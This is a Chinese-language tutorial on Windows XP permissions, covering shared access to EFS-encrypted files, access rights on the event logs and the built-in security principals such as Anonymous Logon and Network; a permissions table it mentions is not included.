Windows XP在EFS上的改进之一就是可以允许多个用户访问加密文件,这些用户既可以是本地用户,也可以是域用户或受信任域的用户。由于无法将证书颁发给用户组,而只能颁发给用户,所以只能授权单个的账户访问加密文件,而用户组将不能被授权。

要授权加密文件可以被多个用户访问,可以按照如下方法进行操作:

选中已经加密的文件,用鼠标右键点击该加密文件,选择"属性",在打开的属性对话框中"常规"选项卡下点击"高级"按钮,打开加密文件的高级属性对话框,点击其中的"详细信息"按钮(加密文件夹此按钮无效),在打开的对话框中点击"添加"按钮添加一个或多个新用户即可(如果计算机加入了域,则还可以点击"寻找用户"按钮在整个域范围内寻找用户)。

如果要删除某个用户对加密文件的访问权限,那么只需选中此用户后点击"删除"按钮即可。

3.日志的访问权限

什么是日志?我们可以将日志理解为系统日记,这本"日记"可以按系统管理员预先的设定,自动将系统中发生的所有事件都一一记录在案,供管理员查询。既然日志信息具有如此重要的参考作用,那么就应该做好未经授权的用户修改或查看的权限控制。因此,我们非常有必要去了解一下日志的访问权限在Windows XP中是怎样设计的。一般来说,Administrators、SYSTEM、Everyone三种类型的账户可以访问日志。

这三种类型的账户对不同类型的日志拥有不同的访问权限,下面来看一下表格中具体的说明,请注意"√"表示拥有此权限;"×"表示无此权限。

通过对比,可以看出SYSTEM拥有的权限最高,可以对任意类型的日志进行读写和清除操作;Everyone用户则可以读取应用程序和系统日志,但对安全日志无法读取。这是因为安全日志相对其他几种类型的日志在安全性方面的要求要高一些,只有SYSTEM 能够对之写入。

如果想为其他用户赋予管理审核安全日志的权限,那么可以在"运行"栏中输入"Gpedit.msc"命令打开组策略编辑器窗口后,依次进入"计算机配置 "→"Windows设置"→"安全设置 "→"本地策略"→"用户权利指派",双击右侧的"管理审核和安全日志"项,在弹出的对话框中添加所需的用户即可。

六、内置安全主体与权限

在Windows XP中,有一群不为人知的用户,它们的作用是可以让我们指派权限到某种"状态"的用户(如"匿名用户"、"网络用户")等,而不是某个特定的用户或组(如 "zhong"、"CPCW"这类用户)。这样一来,对用户权限的管理就更加容易精确控制了。这群用户在Windows XP中,统一称

为内置安全主体。下面让我们来了解一下:

1.安全主体的藏身之处

下面假设需要为一个名为"zhiguo"的目录设置内置安全主体中的"Network"类用户权限为例,看看这群"默默无闻"的用户藏身在系统何处。

首先进入"zhiguo"目录属性界面的"安全"选项卡设置界面,点击其中的"添加"按钮,在弹出的"选择用户或组"对话框中点击"对象类型"按钮。

在弹出对话框中只保留列表中的"内置安全主体"项,并点击"确定"按钮。

在接下来的对话框中点击"高级"按钮,然后在展开的对话框中点击"立即查找"按钮,就可以看到内置安全主体中包含的用户列表了。

2.安全主体作用说明

虽然内置安全主体有很多,但正常能在权限设置中使用到的并不多,所以下面仅说明其中几个较重要的:

①Anonymous Logon:任何没有经过Windows XP验证程序(Authentication),而以匿名方式登录域的用户均属于此组;

②Authenticated Users:与前项相反,所有经过Windows XP验证程序登录的用户均属于此组。设置权限和用户权力时,可考虑用此项代替

Everyone组;

③BATCH:这个组包含任何访问这台计算机的批处理程序(Batch Process);

④DIALUP:任何通过拨号网络登录的用户;

⑤Everyone:指所有经验证登录的用户及来宾(Guest);

⑥Network:任何通过网络登录的用户;

⑦Interactive:指任何直接登录本机的用户;

⑧Terminal server user:指任何通过终端服务登录的用户。

......

在明白了内置安全主体的作用后,在进行权限的具体指派时就可以让权限的应用精确程度更高、权限的应用效果更加高效。显然,Windows XP中设置此类账户是十分有必要的,毕竟计算机是以应用为主,以应用类型进行账户分类,必然会使权限的管理不再混乱,管理更加合理!

推广链接